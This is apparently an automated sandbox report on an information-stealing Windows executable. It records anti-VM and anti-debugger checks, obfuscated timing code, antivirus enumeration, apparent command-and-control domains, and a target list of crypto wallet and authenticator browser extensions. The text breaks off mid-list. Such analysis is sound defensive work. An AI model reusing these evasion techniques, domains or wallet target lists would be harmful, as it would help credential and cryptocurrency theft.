              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60E57 second address: 4F60E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60E5B second address: 4F60E88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC0410B9FAAh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60E88 second address: 4F60E8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60E8E second address: 4F60E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC0410B9FADh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60E9F second address: 4F60F01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F64401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FC040F64407h 0x00000012 pushfd 0x00000013 jmp 00007FC040F64408h 0x00000018 and esi, 7BC23568h 0x0000001e jmp 00007FC040F643FBh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60F01 second address: 4F60F25 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [ebp-04h], 55534552h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC0410B9FB4h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60F68 second address: 4F60F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60F6E second address: 4F60F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70A5C second address: 4F70AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC040F643FEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FC040F64400h 0x00000016 cmp dword ptr [769B459Ch], 05h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC040F64407h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F70B5E second address: 4F70B64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F809E6 second address: 4F809EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F809EC second address: 4F809F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F809F0 second address: 4F809F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F809F4 second address: 4F80AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007FC0410B9FB6h 0x0000000f mov si, 68D1h 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FC0410B9FB7h 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FC0410B9FB6h 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FC0410B9FAEh 0x00000029 and cx, 40B8h 0x0000002e jmp 00007FC0410B9FABh 0x00000033 popfd 0x00000034 push esi 0x00000035 pushfd 0x00000036 jmp 00007FC0410B9FAFh 0x0000003b adc ax, 227Eh 0x00000040 jmp 00007FC0410B9FB9h 0x00000045 popfd 0x00000046 pop eax 0x00000047 popad 0x00000048 push edx 0x00000049 jmp 00007FC0410B9FACh 0x0000004e mov dword ptr [esp], esi 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80AB2 second address: 4F80AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC040F64403h 0x0000000a sub ch, 0000003Eh 0x0000000d jmp 00007FC040F64409h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80AE8 second address: 4F80AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC0410B9FACh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80AF8 second address: 4F80B33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FC040F64407h 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC040F64405h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80B33 second address: 4F80B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC0410B9FACh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80B43 second address: 4F80B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80B47 second address: 4F80B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC0B2A8780Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC0410B9FB9h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80B72 second address: 4F80B78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80B78 second address: 4F80BC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a cmp dword ptr [769B459Ch], 05h 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007FC0410B9FAAh 0x0000001b and si, 53B8h 0x00000020 jmp 00007FC0410B9FABh 0x00000025 popfd 0x00000026 popad 0x00000027 mov dl, al 0x00000029 popad 0x0000002a je 00007FC0B2A9F890h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FC0410B9FAEh 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80BC3 second address: 4F80BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FC040F643FBh 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80BE5 second address: 4F80BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC0410B9FABh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80BF4 second address: 4F80BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80BF8 second address: 4F80C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ch, bl 0x0000000e mov esi, 182BB0F9h 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80C66 second address: 4F80C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80C6A second address: 4F80C87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80C87 second address: 4F80CCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC040F643FAh 0x00000009 or ax, D928h 0x0000000e jmp 00007FC040F643FBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 mov esi, edx 0x0000001b mov bx, 6696h 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC040F64408h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80CCD second address: 4F80CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC0410B9FAEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSpecial instruction interceptor: First address: A87F74 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSpecial instruction interceptor: First address: A87ED0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSpecial instruction interceptor: First address: C2853A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSpecial instruction interceptor: First address: C4FF05 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSpecial instruction interceptor: First address: CB2BF5 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe TID: 5056Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe TID: 5040Thread sleep time: -40020s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeLast function: Thread delayed
              Source: Amcache.hve.12.drBinary or memory string: VMware
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: BJQizQ6sqT.exe, BJQizQ6sqT.exe, 00000000.00000003.2368644392.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540649668.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, BJQizQ6sqT.exe, 00000000.00000002.2540649668.0000000000FE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: Amcache.hve.12.drBinary or memory string: vmci.sys
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: Amcache.hve.12.drBinary or memory string: VMware20,1
              Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: BJQizQ6sqT.exe, 00000000.00000002.2539231638.0000000000C0A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
              Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236601233.00000000058EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: BJQizQ6sqT.exe, 00000000.00000002.2539231638.0000000000C0A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: BJQizQ6sqT.exe, 00000000.00000003.2236935512.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: SICE
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: BJQizQ6sqT.exe, 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: steppriflej.xyz
              Source: BJQizQ6sqT.exe, 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sendypaster.xyz
              Source: BJQizQ6sqT.exe, 00000000.00000003.2150943800.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cuddlyready.xyz
              Source: BJQizQ6sqT.exe, 00000000.00000002.2539633581.0000000000C4E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: BJQizQ6sqT.exe, BJQizQ6sqT.exe, 00000000.00000003.2368644392.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: BJQizQ6sqT.exe PID: 4140, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: BJQizQ6sqT.exeString found in binary or memory: Wallets/Electrum
              Source: BJQizQ6sqT.exeString found in binary or memory: Wallets/ElectronCash
              Source: BJQizQ6sqT.exeString found in binary or memory: window-state.json
              Source: BJQizQ6sqT.exe, 00000000.00000003.2264526296.00000000058DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyn
              Source: BJQizQ6sqT.exe, 00000000.00000003.2292779065.000000000105D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: mcmbachjpdbijejflpcm","ez":"Steem Keychain"},{"en":"onofpnbbkehpmmoabgpcpmigafmmnjh","ez":"Nash Extension"},{"en":"bcopgchhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget 